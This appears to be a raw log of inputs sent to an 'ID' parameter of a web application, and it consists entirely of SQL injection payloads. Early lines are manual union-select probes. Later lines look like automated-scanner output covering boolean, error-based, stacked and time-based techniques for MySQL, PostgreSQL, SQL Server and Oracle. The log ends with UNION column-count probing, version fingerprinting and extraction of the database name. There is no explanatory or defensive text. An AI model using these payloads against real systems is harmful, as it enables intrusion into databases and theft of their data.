ID:-1\
ID:-1' union select 1,2,3  -- 
ID:-1' union select 1,2,3  and 1=1 -- 
ID:-1' union select 1,2,3  and '1=1 -- 
ID:-1' union select 1,2,3  and '1=1
ID:-1' union select 1,2,3  and '1=1
ID:-1' union select 1,2,3  and '1=1
ID:-1' union select 1,2,3  and '1=1
ID:-1' union select 1,2,3  and '1=1
ID:-1' union select 1,2,3  AND '1=1
ID:-1' union select 1,2,3  '1=1
ID:-1' union select 1,2,3  '1
ID:-1' union select 1,2,3  'name_of_3
ID:-1' union select 1,2,3  'name_of_3
ID:-1' union select 1,2,3  'name_of_3
ID:-1' union select 1,2,3  -- 
ID:1
ID:1'
ID:1' and '1=1
ID:1' && '1=1
ID:1' '1=1
ID:1
ID:1
ID:1'
ID:1'
ID:1'and/**/extractvalue(1,concat(char(126),md5(1836161162)))and'
ID:1'-- 
ID:1"and/**/extractvalue(1,concat(char(126),md5(1836161162)))and"
ID:1/**/and/**/extractvalue(1,concat(char(126),md5(1836161162)))
ID:1
ID:1 and sleep(5)
ID:1'and sleep(5) and '1
ID:1"and sleep(5) and "1
ID:1/**/and(select*from(select+sleep(5)union/**/select+1)a)
ID:1'and(select*from(select/**/sleep(5))a/**/union/**/select+1)='
ID:1"and(select*from(select/**/sleep(5))a/**/union/**/select+1)="
ID:1/**/and(select/**/1/**/from/**/pg_sleep(5))>0/**/
ID:1'/**/and(select'1'from/**/pg_sleep(5))::text>'0
ID:1"/**/and(select"1"from/**/pg_sleep(5))::text>"0
ID:1/**/and(select/**/1)>0/**/waitfor/**/delay'0:0:5'/**/
ID:1'and(select/**/1)>0/**/waitfor/**/delay'0:0:5
ID:1"and(select/**/1)>0/**/waitfor/**/delay"0:0:5
ID:1/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('q',5)
ID:1'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('h',5)='h
ID:1"/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE("h",5)="h
ID:1
ID:1
ID:1
ID:1
ID:2214
ID:1'"...,.),,
ID:1'itqhro<'">EpevHl
ID:1) AND 5174=2634 AND (1605=1605
ID:1) AND 1883=1883 AND (6612=6612
ID:1) AND 3705=2877 AND (2352=2352
ID:1 AND 4181=7430
ID:1 AND 1883=1883
ID:1 AND 3539=7579
ID:1 AND 1199=7991-- GJvD
ID:1 AND 1883=1883-- iuSb
ID:1 AND 4244=1837-- wOIs
ID:1') AND 1220=3472 AND ('pkir'='pkir
ID:1') AND 1883=1883 AND ('pMZT'='pMZT
ID:1' AND 6415=3723 AND 'MlYr'='MlYr
ID:1' AND 1883=1883 AND 'oAdE'='oAdE
ID:(SELECT (CASE WHEN (2810=2223) THEN 1 ELSE (SELECT 2223 UNION SELECT 2803) END))
ID:(SELECT (CASE WHEN (5834=5834) THEN 1 ELSE (SELECT 2144 UNION SELECT 6304) END))
ID:(SELECT CONCAT(CONCAT(0x71716a7671,(CASE WHEN (5311=5311) THEN 0x31 ELSE 0x30 END)),0x7171767071))
ID:1) AND 8018=9294#
ID:1) AND 7405=7405#
ID:1) AND 6514=3058#
ID:1)) AND 1422=1019#
ID:1)) AND 7405=7405#
ID:1)) AND 3447=7001#
ID:1))) AND 4247=5330#
ID:1))) AND 7405=7405#
ID:1))) AND 5901=7826#
ID:1 AND 8362=6937#
ID:1 AND 7405=7405#
ID:1 AND 2749=7445#
ID:1)) AS zhJQ WHERE 3979=3979 AND 3611=2087#
ID:1)) AS epWy WHERE 7058=7058 AND 7405=7405#
ID:1) AS fIuz WHERE 6247=6247 AND 1771=1701#
ID:1) AS KVdE WHERE 4787=4787 AND 7405=7405#
ID:1` WHERE 1316=1316 AND 1762=4278#
ID:1` WHERE 9716=9716 AND 7405=7405#
ID:1` WHERE 7320=7320 AND 5765=4741#
ID:1`) WHERE 4773=4773 AND 7195=7798#
ID:1`) WHERE 8808=8808 AND 7405=7405#
ID:1`) WHERE 4423=4423 AND 4441=3392#
ID:1') AND 6380=2177#
ID:1') AND 7405=7405#
ID:1' AND 2913=2680#
ID:1' AND 7405=7405#
ID:1" AND 8812=9979#
ID:1" AND 7405=7405#
ID:1" AND 2214=7656#
ID:1')) AND 5077=7732#
ID:1')) AND 7405=7405#
ID:1'))) AND 6543=6402#
ID:1'))) AND 7405=7405#
ID:1%' AND 2833=8629#
ID:1%' AND 7405=7405#
ID:1") AND 2879=2588#
ID:1") AND 7405=7405#
ID:1") AND 6834=3857#
ID:1")) AND 8530=3129#
ID:1")) AND 7405=7405#
ID:1")) AND 6320=6537#
ID:1"))) AND 1425=9642#
ID:1"))) AND 7405=7405#
ID:1"))) AND 7545=7479#
ID:1')) AS pfPf WHERE 8358=8358 AND 1081=1085#
ID:1')) AS MUFs WHERE 4459=4459 AND 7405=7405#
ID:1")) AS EiGl WHERE 7756=7756 AND 1646=7190#
ID:1")) AS iwde WHERE 2469=2469 AND 7405=7405#
ID:1') AS tQNJ WHERE 9267=9267 AND 7284=9628#
ID:1') AS nypx WHERE 9213=9213 AND 7405=7405#
ID:1") AS FULj WHERE 9337=9337 AND 6992=5414#
ID:1") AS cIYX WHERE 9072=9072 AND 7405=7405#
ID:1' IN BOOLEAN MODE) AND 5308=7709#
ID:1' IN BOOLEAN MODE) AND 7405=7405#
ID:-6002
ID:-3391) OR 4915=8732#
ID:-7930) OR 3576=3576#
ID:-9812)) OR 3185=3065#
ID:-7125)) OR 3576=3576#
ID:-3497))) OR 6782=2175#
ID:-6270))) OR 3576=3576#
ID:-3890 OR 2889=3630#
ID:-3806 OR 3576=3576#
ID:-7504)) AS JaDx WHERE 6703=6703 OR 6387=1590#
ID:-4036)) AS NbMm WHERE 5744=5744 OR 3576=3576#
ID:-6118)) AS KIqy WHERE 5853=5853 OR 8939=7959#
ID:-8090) AS GrAt WHERE 8822=8822 OR 3963=4639#
ID:-1447) AS DUkY WHERE 1982=1982 OR 3576=3576#
ID:-6602) AS ODYt WHERE 3403=3403 OR 9014=6983#
ID:-3298') OR 6808=1285#
ID:-3161') OR 3576=3576#
ID:-4177') OR 8854=7653#
ID:-3788' OR 1569=4260#
ID:-4458' OR 3576=3576#
ID:-5743' OR 5525=1287#
ID:-5027" OR 8575=3861#
ID:-8434" OR 3576=3576#
ID:-2430')) OR 8268=4074#
ID:-4991')) OR 3576=3576#
ID:-7516')) OR 9848=5196#
ID:-9064'))) OR 2425=6471#
ID:-6644'))) OR 3576=3576#
ID:-9904'))) OR 4665=6492#
ID:-4382%' OR 6992=1191#
ID:-7460%' OR 3576=3576#
ID:-5144%' OR 5485=7877#
ID:-7300") OR 2018=7748#
ID:-9762") OR 3576=3576#
ID:-8613")) OR 1904=6808#
ID:-3548")) OR 3576=3576#
ID:-5078"))) OR 8172=3790#
ID:-5285"))) OR 3576=3576#
ID:-9191')) AS nYnS WHERE 5157=5157 OR 6168=2451#
ID:-9340')) AS QrlU WHERE 9253=9253 OR 3576=3576#
ID:-8740')) AS VYKE WHERE 6402=6402 OR 7905=4956#
ID:-8173")) AS eqzb WHERE 6863=6863 OR 2954=2277#
ID:-1871")) AS UUrE WHERE 5155=5155 OR 3576=3576#
ID:-7070")) AS OzFB WHERE 4956=4956 OR 7811=5604#
ID:-4531') AS wTJj WHERE 3570=3570 OR 4456=6302#
ID:-4089') AS xVBj WHERE 2134=2134 OR 3576=3576#
ID:-8952') AS yTLT WHERE 3792=3792 OR 3064=5206#
ID:-5588") AS erMx WHERE 5246=5246 OR 8825=5052#
ID:-6022") AS gHFO WHERE 9789=9789 OR 3576=3576#
ID:-8353") AS ssaK WHERE 9464=9464 OR 8142=7216#
ID:1) OR NOT 6179=9760#
ID:1) OR NOT 9907=9907#
ID:1) OR NOT 2846=1912#
ID:1)) OR NOT 8890=3446#
ID:1)) OR NOT 9907=9907#
ID:1)) OR NOT 7356=1950#
ID:1))) OR NOT 9353=7687#
ID:1))) OR NOT 9907=9907#
ID:1))) OR NOT 1581=7346#
ID:1 OR NOT 7154=7841#
ID:1 OR NOT 9907=9907#
ID:1 OR NOT 2232=9470#
ID:1)) AS erdd WHERE 2985=2985 OR NOT 1454=6580#
ID:1)) AS DPHl WHERE 1425=1425 OR NOT 9907=9907#
ID:1) AS kwxL WHERE 9678=9678 OR NOT 2568=7683#
ID:1) AS umPz WHERE 1832=1832 OR NOT 9907=9907#
ID:1` WHERE 3374=3374 OR NOT 8000=3418#
ID:1` WHERE 9925=9925 OR NOT 9907=9907#
ID:1` WHERE 4519=4519 OR NOT 9205=1984#
ID:1`) WHERE 1700=1700 OR NOT 5983=4896#
ID:1`) WHERE 7049=7049 OR NOT 9907=9907#
ID:1`) WHERE 4548=4548 OR NOT 5480=7556#
ID:1') OR NOT 6350=8417#
ID:1') OR NOT 9907=9907#
ID:1' OR NOT 8401=6129#
ID:1' OR NOT 9907=9907#
ID:1" OR NOT 5668=6931#
ID:1" OR NOT 9907=9907#
ID:1" OR NOT 1989=5998#
ID:1')) OR NOT 8220=7616#
ID:1')) OR NOT 9907=9907#
ID:1'))) OR NOT 9537=5172#
ID:1'))) OR NOT 9907=9907#
ID:1%' OR NOT 3219=8050#
ID:1%' OR NOT 9907=9907#
ID:1") OR NOT 6306=9706#
ID:1") OR NOT 9907=9907#
ID:1") OR NOT 1632=4049#
ID:1")) OR NOT 2916=9450#
ID:1")) OR NOT 9907=9907#
ID:1")) OR NOT 5828=9019#
ID:1"))) OR NOT 4160=6933#
ID:1"))) OR NOT 9907=9907#
ID:1"))) OR NOT 9029=3149#
ID:1')) AS pBYR WHERE 4379=4379 OR NOT 4551=8577#
ID:1')) AS GKBp WHERE 2591=2591 OR NOT 9907=9907#
ID:1")) AS DFaD WHERE 9470=9470 OR NOT 4166=5706#
ID:1")) AS WWLQ WHERE 6916=6916 OR NOT 9907=9907#
ID:1') AS aUiA WHERE 8027=8027 OR NOT 5683=1502#
ID:1') AS rGtO WHERE 1236=1236 OR NOT 9907=9907#
ID:1") AS ZYAe WHERE 8583=8583 OR NOT 6569=4553#
ID:1") AS vsqB WHERE 5679=5679 OR NOT 9907=9907#
ID:1' IN BOOLEAN MODE) OR NOT 1040=7928#
ID:1' IN BOOLEAN MODE) OR NOT 9907=9907#
ID:1) RLIKE (SELECT (CASE WHEN (8507=4412) THEN 1 ELSE 0x28 END))-- mRWG
ID:1) RLIKE (SELECT (CASE WHEN (3340=3340) THEN 1 ELSE 0x28 END))-- sUxC
ID:1) RLIKE (SELECT (CASE WHEN (5119=7232) THEN 1 ELSE 0x28 END)) AND (2856=2856
ID:1) RLIKE (SELECT (CASE WHEN (3340=3340) THEN 1 ELSE 0x28 END)) AND (1682=1682
ID:1)) RLIKE (SELECT (CASE WHEN (3251=2690) THEN 1 ELSE 0x28 END)) AND ((2271=2271
ID:1)) RLIKE (SELECT (CASE WHEN (3340=3340) THEN 1 ELSE 0x28 END)) AND ((9609=9609
ID:1))) RLIKE (SELECT (CASE WHEN (8429=9597) THEN 1 ELSE 0x28 END)) AND (((1462=1462
ID:1))) RLIKE (SELECT (CASE WHEN (3340=3340) THEN 1 ELSE 0x28 END)) AND (((5428=5428
ID:1 RLIKE (SELECT (CASE WHEN (1695=5288) THEN 1 ELSE 0x28 END))
ID:1 RLIKE (SELECT (CASE WHEN (3340=3340) THEN 1 ELSE 0x28 END))
ID:1 RLIKE (SELECT (CASE WHEN (6191=7400) THEN 1 ELSE 0x28 END))-- ERpi
ID:1 RLIKE (SELECT (CASE WHEN (3340=3340) THEN 1 ELSE 0x28 END))-- VbCf
ID:1 RLIKE (SELECT (CASE WHEN (3160=4514) THEN 1 ELSE 0x28 END))# cRdR
ID:1 RLIKE (SELECT (CASE WHEN (3340=3340) THEN 1 ELSE 0x28 END))# GcfT
ID:1)) AS zRnM WHERE 5009=5009 RLIKE (SELECT (CASE WHEN (1480=5653) THEN 1 ELSE 0x28 END))-- HACR
ID:1)) AS AlMm WHERE 4014=4014 RLIKE (SELECT (CASE WHEN (3340=3340) THEN 1 ELSE 0x28 END))-- xVVh
ID:1) AS qnKG WHERE 2397=2397 RLIKE (SELECT (CASE WHEN (3478=4817) THEN 1 ELSE 0x28 END))-- XmwA
ID:1) AS iGeb WHERE 9856=9856 RLIKE (SELECT (CASE WHEN (3340=3340) THEN 1 ELSE 0x28 END))-- gdvH
ID:1` WHERE 8249=8249 RLIKE (SELECT (CASE WHEN (1679=8059) THEN 1 ELSE 0x28 END))-- ZFES
ID:1` WHERE 8286=8286 RLIKE (SELECT (CASE WHEN (3340=3340) THEN 1 ELSE 0x28 END))-- HZgN
ID:1`) WHERE 8119=8119 RLIKE (SELECT (CASE WHEN (6713=1826) THEN 1 ELSE 0x28 END))-- vZnU
ID:1`) WHERE 2400=2400 RLIKE (SELECT (CASE WHEN (3340=3340) THEN 1 ELSE 0x28 END))-- hCoK
ID:1') RLIKE (SELECT (CASE WHEN (3270=1349) THEN 1 ELSE 0x28 END))-- OzVf
ID:1') RLIKE (SELECT (CASE WHEN (3340=3340) THEN 1 ELSE 0x28 END))-- RQcD
ID:1' RLIKE (SELECT (CASE WHEN (9744=3427) THEN 1 ELSE 0x28 END))-- ILXn
ID:1' RLIKE (SELECT (CASE WHEN (3340=3340) THEN 1 ELSE 0x28 END))-- jQfq
ID:1' RLIKE (SELECT (CASE WHEN (9219=8348) THEN 1 ELSE 0x28 END))-- RmPw
ID:1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71716a7671,(SELECT (ELT(1698=1698,1))),0x7171767071,0x78))s), 8446744073709551610, 8446744073709551610)))-- xdyj
ID:1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71716a7671,(SELECT (ELT(5529=5529,1))),0x7171767071,0x78))s), 8446744073709551610, 8446744073709551610)))-- KiTh
ID:1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x71716a7671,(SELECT (ELT(7466=7466,1))),0x7171767071,0x78))x))-- GpRT
ID:1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x71716a7671,(SELECT (ELT(9515=9515,1))),0x7171767071,0x78))x))-- zdzJ
ID:1' AND GTID_SUBSET(CONCAT(0x71716a7671,(SELECT (ELT(2722=2722,1))),0x7171767071),2722)-- PQds
ID:1' OR GTID_SUBSET(CONCAT(0x71716a7671,(SELECT (ELT(4492=4492,1))),0x7171767071),4492)-- owUF
ID:1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71716a7671,(SELECT (ELT(9834=9834,1))),0x7171767071)) USING utf8)))-- czWO
ID:1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71716a7671,(SELECT (ELT(1592=1592,1))),0x7171767071)) USING utf8)))-- gPIh
ID:1' AND (SELECT 8824 FROM(SELECT COUNT(*),CONCAT(0x71716a7671,(SELECT (ELT(8824=8824,1))),0x7171767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- orDI
ID:1' OR (SELECT 3699 FROM(SELECT COUNT(*),CONCAT(0x71716a7671,(SELECT (ELT(3699=3699,1))),0x7171767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tLrJ
ID:1' AND EXTRACTVALUE(7865,CONCAT(0x5c,0x71716a7671,(SELECT (ELT(7865=7865,1))),0x7171767071))-- gECG
ID:1' OR EXTRACTVALUE(4290,CONCAT(0x5c,0x71716a7671,(SELECT (ELT(4290=4290,1))),0x7171767071))-- AnAQ
ID:1' AND UPDATEXML(4523,CONCAT(0x2e,0x71716a7671,(SELECT (ELT(4523=4523,1))),0x7171767071),6024)-- shKn
ID:1' OR UPDATEXML(6071,CONCAT(0x2e,0x71716a7671,(SELECT (ELT(6071=6071,1))),0x7171767071),5050)-- zmdm
ID:1' AND ROW(2795,2087)>(SELECT COUNT(*),CONCAT(0x71716a7671,(SELECT (ELT(2795=2795,1))),0x7171767071,FLOOR(RAND(0)*2))x FROM (SELECT 9617 UNION SELECT 3420 UNION SELECT 8703 UNION SELECT 6020)a GROUP BY x)-- iRqU
ID:1' OR ROW(7878,9573)>(SELECT COUNT(*),CONCAT(0x71716a7671,(SELECT (ELT(7878=7878,1))),0x7171767071,FLOOR(RAND(0)*2))x FROM (SELECT 5308 UNION SELECT 9203 UNION SELECT 7998 UNION SELECT 9022)a GROUP BY x)-- bSWn
ID:-9242' OR 1 GROUP BY CONCAT(0x71716a7671,(SELECT (CASE WHEN (4621=4621) THEN 1 ELSE 0 END)),0x7171767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#
ID:1' PROCEDURE ANALYSE(EXTRACTVALUE(8451,CONCAT(0x5c,0x71716a7671,(SELECT (CASE WHEN (8451=8451) THEN 1 ELSE 0 END)),0x7171767071)),1)-- ZTCP
ID:1',(SELECT 8869 FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71716a7671,(SELECT (ELT(8869=8869,1))),0x7171767071,0x78))s), 8446744073709551610, 8446744073709551610)))x)-- Evot
ID:1',(SELECT 3557 FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT(0x71716a7671,(SELECT (ELT(3557=3557,1))),0x7171767071,0x78))x)))s)-- jUce
ID:1',GTID_SUBSET(CONCAT(0x71716a7671,(SELECT (ELT(6435=6435,1))),0x7171767071),6435)-- kSyc
ID:1',(SELECT 1303 FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71716a7671,(SELECT (ELT(1303=1303,1))),0x7171767071)) USING utf8))))x)-- chVh
ID:1',(SELECT 7470 FROM(SELECT COUNT(*),CONCAT(0x71716a7671,(SELECT (ELT(7470=7470,1))),0x7171767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- eldX
ID:1',EXTRACTVALUE(1045,CONCAT(0x5c,0x71716a7671,(SELECT (ELT(1045=1045,1))),0x7171767071))-- ABuX
ID:1',UPDATEXML(8336,CONCAT(0x2e,0x71716a7671,(SELECT (ELT(8336=8336,1))),0x7171767071),6539)-- aHUY
ID:1',(SELECT 7107 FROM (SELECT ROW(7107,3115)>(SELECT COUNT(*),CONCAT(0x71716a7671,(SELECT (ELT(7107=7107,1))),0x7171767071,FLOOR(RAND(0)*2))x FROM (SELECT 7237 UNION SELECT 2941 UNION SELECT 9511 UNION SELECT 6603)a GROUP BY x))s)-- OKwT
ID:(SELECT CONCAT(0x71716a7671,(ELT(9389=9389,1)),0x7171767071))
ID:1';SELECT SLEEP(5)#
ID:1';SELECT SLEEP(5)-- HRfQ
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))Mudz)#
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))vKXg)-- jhfd
ID:1';SELECT BENCHMARK(5000000,MD5(0x4e6a6956))#
ID:1';SELECT BENCHMARK(5000000,MD5(0x74426258))-- Hbmd
ID:1' AND (SELECT 9346 FROM (SELECT(SLEEP(5)))NMZd)-- SASB
ID:1' OR (SELECT 8722 FROM (SELECT(SLEEP(5)))tbcr)-- RnOS
ID:1' AND SLEEP(5)-- PBmW
ID:1' OR SLEEP(5)-- pBLQ
ID:1' AND SLEEP(5)#
ID:1' OR SLEEP(5)#
ID:1' AND (SELECT 4720 FROM (SELECT(SLEEP(5)))lSll)#
ID:1' OR (SELECT 7470 FROM (SELECT(SLEEP(5)))NAHH)#
ID:1' AND 6470=BENCHMARK(5000000,MD5(0x73474b4c))-- NOvc
ID:1' AND 2714=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)-- nyqN
ID:1' OR 1343=BENCHMARK(5000000,MD5(0x6c794676))-- zDSt
ID:1' OR 7366=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)-- TcGq
ID:1' AND 8047=BENCHMARK(5000000,MD5(0x69515671))#
ID:1' AND 2886=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)#
ID:1' OR 8746=BENCHMARK(5000000,MD5(0x78567254))#
ID:1' OR 2944=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)#
ID:1' RLIKE SLEEP(5)-- ceRt
ID:1' RLIKE SLEEP(0)-- ceRt
ID:1' RLIKE SLEEP(5)-- ceRt
ID:1'
ID:1' union select 1,2,3 -- 
ID:1' ORDER BY 1#
ID:1' UNION ALL SELECT NULL#
ID:1' UNION ALL SELECT NULL,NULL#
ID:1' UNION ALL SELECT NULL,NULL,NULL#
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL#
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1' UNION ALL SELECT CONCAT(0x71716a7671,0x497a74495651486d79707a6f7a7252446f6d6f4b6b644778776d634a6a4569627446646a4b626952,0x7171767071),NULL,NULL#
ID:1' UNION ALL SELECT NULL,CONCAT(0x71716a7671,0x49536d4e667a4f616a7357496b496e72764f45666458786e714445694f5a63456a566175414e6358,0x7171767071),NULL#
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x71716a7671,0x53616153476a664f67617874514451786f557a6279797349647578466841415a69444a6a4b697a5a,0x7171767071)#
ID:1' UNION ALL SELECT CONCAT(0x71716a7671,0x50484e5a67694c526758,0x7171767071),NULL,NULL#
ID:1' UNION ALL SELECT NULL,CONCAT(0x71716a7671,0x6350686943514e415869,0x7171767071),NULL#
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x71716a7671,0x4e6d7068704c717a675a,0x7171767071)#
ID:-4998' UNION ALL SELECT CONCAT(0x71716a7671,0x794658556157575267514971475973796846785569464d61544c5a736d50567570697a42784b4143,0x7171767071),NULL,NULL#
ID:-5109' UNION ALL SELECT NULL,CONCAT(0x71716a7671,0x6b4a75564e4769464f58496a57634474594c6150595459646e5a506d52665a61716c474e666d4952,0x7171767071),NULL#
ID:-6324' UNION ALL SELECT NULL,CONCAT(0x71716a7671,(CASE WHEN (9331=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                9331) THEN 1 ELSE 0 END),0x7171767071),NULL#
ID:-4237' UNION ALL SELECT NULL,CONCAT(0x71716a7671,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x7171767071),NULL#
ID:-9709' UNION ALL SELECT NULL,CONCAT(0x71716a7671,(CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END),0x7171767071),NULL#
ID:-7468' UNION ALL SELECT NULL,CONCAT(0x71716a7671,(CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END),0x7171767071),NULL#
ID:-1130' UNION ALL SELECT NULL,CONCAT(0x71716a7671,(CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END),0x7171767071),NULL#
ID:-6607' UNION ALL SELECT NULL,CONCAT(0x71716a7671,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x7171767071),NULL#
ID:-6158' UNION ALL SELECT NULL,CONCAT(0x71716a7671,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x7171767071),NULL#
ID:1
ID:-7393' UNION ALL SELECT NULL,CONCAT(0x71716a7671,IFNULL(CAST(DATABASE() AS NCHAR),0x20),0x7171767071),NULL#
